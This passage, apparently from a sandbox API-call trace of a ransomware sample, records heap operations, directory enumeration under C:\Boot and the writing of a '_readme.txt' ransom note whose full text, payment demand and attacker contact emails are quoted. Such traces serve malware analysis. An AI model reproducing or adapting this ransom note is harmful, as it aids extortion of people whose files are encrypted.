(HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.587] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0228.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.587] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.587] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.587] PathFindFileNameW (pszPath="") returned="" [0228.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.587] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.588] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3b78058 [0228.588] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3466428 [0228.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.588] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.588] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0228.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.588] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 0 [0228.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x3b7b818 [0228.590] lstrcpyW (in: lpString1=0x3b7b818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.590] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3467538 [0228.590] CreateFileW (lpFileName="C:\\Boot\\it-IT\\_readme.txt" (normalized: "c:\\boot\\it-it\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3467538 | out: hHeap=0x620000) returned 1 [0228.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b818 | out: hHeap=0x620000) returned 1 [0228.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79140 [0228.590] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.590] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.591] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.591] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.591] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.591] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 